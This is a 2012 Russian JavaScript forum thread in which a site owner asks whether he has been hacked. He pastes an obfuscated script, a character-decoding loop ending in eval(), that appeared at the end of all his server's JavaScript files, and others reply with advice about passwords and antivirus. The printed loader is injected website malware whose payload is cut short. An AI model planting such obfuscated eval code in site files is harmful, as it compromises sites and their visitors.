Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 27.02.2012, 19:30
Кандидат Javascript-наук
Отправить личное сообщение для MininAS Посмотреть профиль Найти все сообщения от MininAS
 
Регистрация: 22.09.2009
Сообщений: 122

Меня взломали?
Обращаюсь ко всем, кто может сказать, что это??????????????????
Данный код невзначай появился в конце всех моих javascript файлах на сервере где лежит сайт.
Откуда он мог взяться и чего стоит бояться???
var y377ea5="";
function h8a10a0762acf()
{
	var s632887d9=String,red9ec24=Array.prototype.slice.call(arguments).join(""),se887e1=red9ec24.substr(7,3)-397,f6ba29112,a48101af;red9ec24=red9ec24.substr(10);
	var f5b47291d=u1f0b808(red9ec24);
	for(var y7f3123=0;y7f3123<f5b47291d;y7f3123++)
	{
		try {throw(p24fbf=red9ec24.substr(y7f3123,1));}
		catch(e){p24fbf=e;};
		if(p24fbf=='}')
		{
			se887e1="";y7f3123++;c12adcad2=f9b87d(red9ec24,y7f3123);
			while(c12adcad2!='}')
			{
				se887e1+=c12adcad2;y7f3123++;c12adcad2=red9ec24.substr(y7f3123,1);
			}
			se887e1-=594;
			continue;
		}
		f6ba29112="";
		if(h1bf42884(p24fbf))
		{
			y7f3123++;p24fbf=red9ec24.substr(y7f3123,1);
			while(p24fbf!='®')
			{
				f6ba29112+=p24fbf;y7f3123++;p24fbf=red9ec24.substr(y7f3123,1);
			}
			f6ba29112=f6ba29112-se887e1-23;
			if(f6ba29112<0)f6ba29112+=256;
			if(f6ba29112>=192)f6ba29112+=848;
			else if(f6ba29112==168)f6ba29112=1025;
			else if(f6ba29112==184)f6ba29112=1105;
			y377ea5+=s632887d9["\x66\x72\x6fmC\x68arC\x6f\x64\x65"](f6ba29112);
			continue;
		}
		m61e9943=(p24fbf+'')["c\x68\x61\x72C\x6f\x64e\x41t"](0);
		if(m61e9943>848)m61e9943-=848;
		a48101af=m61e9943-se887e1-23;
		a48101af=eac0f89(a48101af);
		y377ea5+=y22ffd(a48101af);
	}
}
h8a10a0762acf("e8","9","d41c","49","8","®16","4","®®","226","®}","6","7","1}","®21","7®}","6","1","9","}","®","15","8®®","1","4","7","®","}70","2}","®","2","47®}7","6","8","}.","43","}66","7}®1","36","®}","65","7}®","127®","v®","20","9®c`_®20","4®®","183®®","2","0","0®","v","®2","0","3","®®20","0","®","}6","0","6}","®1","43®}","6","9","5","}®15","6®","®","1","85","®","}6","8","0","}®1","4","1®","®","14","8","®}67","7}","®","210®}","742}®3","1","®}","6","9","4","}","®239®®","2","3","5","®","®1","81","®","}","6","16}","\\}","77","3","}","®24","9","®}603","}","®","1","3","7","®","®1","32","®","®","14","0®","®13","3®","®131®}710}
..... тут еще всякое такое ......
®160®","}7","0","6","}®14","5","®","}67","4}p}688}","®242®","®","1","7","6","®®","13","0","®","®","12","7","®","}6","7","0","}","®22","4®","}698","}","®","16","8®","®1","67","®®1","68","®}70","7}","®","1","95®","");
eval(y377ea5);
function u1f0b808(s69e6196b)
{
	return s69e6196b.length;
}
function f9b87d(fa3ec22be,v1e4e8fd)
{
	return fa3ec22be.substr(v1e4e8fd,1);
}
function h1bf42884(y3a3626a)
{
	return y3a3626a=='®';
}function y22ffd(i0052e5)
{
	var s632887d9=String;
	return s632887d9["\x66\x72\x6fmC\x68arC\x6f\x64\x65"](i0052e5);
}
function eac0f89(b7dab4f16)
{
	var kbc85a7=b7dab4f16;
	if(kbc85a7<0)kbc85a7+=256;
	if(kbc85a7==168)kbc85a7=1025;
	else if(kbc85a7==184)kbc85a7=1105;
	return (kbc85a7>=192 && kbc85a7<256) ? kbc85a7+848 : kbc85a7;
}
Ответить с цитированием
  #2 (permalink)  
Старый 27.02.2012, 19:33
что-то знаю
Отправить личное сообщение для devote Посмотреть профиль Найти все сообщения от devote
 
Регистрация: 24.05.2009
Сообщений: 5,176

смени пароли на своих серверах и почисти свой и те компы с которых ходишь на сервер от вирусов, и не будет проблем.
Ответить с цитированием
  #3 (permalink)  
Старый 27.02.2012, 19:40
Кандидат Javascript-наук
Отправить личное сообщение для MininAS Посмотреть профиль Найти все сообщения от MininAS
 
Регистрация: 22.09.2009
Сообщений: 122

Пароль уже поменял. Про вирусы: стоит Avira не знаю на сколько он хорош...
А вот на рабочем компе антивира нету, завтра воткну.
Ответить с цитированием
  #4 (permalink)  
Старый 27.02.2012, 19:42
что-то знаю
Отправить личное сообщение для devote Посмотреть профиль Найти все сообщения от devote
 
Регистрация: 24.05.2009
Сообщений: 5,176

Сообщение от MininAS
стоит Avira не знаю на сколько он хорош...
А ты подумай? Для бесплатных програм понятие лучше/хуже нет, но вот для бесплатных антивирей понятие лучше/хуже есть. Авира не лучший антивирь. Не жалей на антивирь денег и пользуй нормальным, ну а если данные на компе не так важны, то можно и авирой пользовать.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Неочевидная работа операторов сравнения(для меня) Sundro Общие вопросы Javascript 6 17.01.2012 17:21
Меня одного задолбал? FINoM Оффтопик 32 14.01.2012 12:39
Мужики у меня вопрос по поводу ajax Niksik AJAX и COMET 6 13.01.2012 21:47
У меня есть вопрос rzhsasha Firefox/Mozilla 29 08.12.2010 18:48
Простой сценарий определения текущего времени у меня в браузере почему-то не работает WitaliG Общие вопросы Javascript 2 02.08.2010 22:05